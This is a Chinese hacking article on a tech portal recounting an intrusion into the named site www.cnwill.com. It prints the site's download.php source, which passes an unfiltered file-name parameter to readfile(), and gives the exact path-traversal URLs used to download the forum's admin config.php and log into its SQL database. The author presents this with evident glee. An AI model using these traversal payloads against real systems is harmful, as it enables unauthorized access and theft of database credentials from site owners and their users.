Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 黑客技术 > 入侵www.cnwill.com
【标  题】:入侵www.cnwill.com
【关键字】:c,com,www,cn,入侵,www,cnwill
【来  源】:网络

入侵www.cnwill.com

Your Ad Here by ≯Super·Hei (sex.cnse8.com) 问题出在下载系统的download.php 我们访问:http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt 呵呵 !! 看到./你会想到什么 :) http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt 返回:
Warning: readfile(): Unable to access ../www.ChinaSafe.org.txt in /usr/home/cnwill/soft/download.php on line 35

Warning: readfile(../www.ChinaSafe.org.txt): failed to open stream: Invalid argument in /usr/home/cnwill/soft/download.php on line 35
看来使用的是readfile(),去下个原文件看看先。download.php代码: $extensie = strrchr($_GET[fname], "."); if (!in_array(substr($extensie, 1), $not_to_be_dloaded)) { // the source file is output readfile($_GET[fname]); } else { // message when downloading a forbidden file echo "$msg_not_allowed"; } ?> 对fname没有过滤.和/ 看来我们可以readfile所有的文件拉 哈哈~~~ 目标得到论坛config.php,呵呵~~ 其他的好象都是文本数据的 。 看看论坛 Powered by: vBulletin Version 2.2.8 提交http://www.cnwill.com/forum/readme.txt 返回readme.txt的内容,看来存在readme.txt 我们回到download.php,提交: http://www.cnwill.com/soft/download.php?fname=./../forum/readme.txt 哈哈!! 成功返回 胜利就在眼前拉。 提交http://www.cnwill.com/soft/download.php?fname=./../forum/admin/config.php 哈哈 出现个下载提示,用网快下载后打开: 呵呵 用sql连接成功,hoho 以下的事是体力活。。呵呵 不想干了
代理服务的欺骗:【上一篇】
<WIN常见漏洞攻击与防范实战>第四章C(2):【下一篇】
【相关文章】
  • 破解Session cookie的方法
  • 从ipc$到开放3389到3389只为你服务
  • 图谋不轨的家伙攻击你PC.你会?
  • 一次艰难而真实的入侵(1)
  • 一次艰难而真实的入侵(2)
  • Sql Injection入侵方法全部收集(1)
  • Sql Injection入侵方法全部收集(2)
  • 利用frontpage入侵
  • 黑客是如何入侵网站的?
  • 网络入侵实用战术手册(UNIX)(6)
  • 【随机文章】
  • Begin to learn JAVA form now
  • 苏泊尔耗的JPEG解码器[三]
  • 计算机中的字符,字节和编码
  • 任务栏
  • 思科推出新认证----CCNS
  • 上手Quartz(转)
  • 一个实现字符串中单词顺序反转的小例子。。。
  • 90天搞定系统分析员考试回顾
  • VOIP 网络电话的误解
  • 通过分析SQL语句的执行计划优化SQL (八)
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 软讯网络 All Rigths Reserved.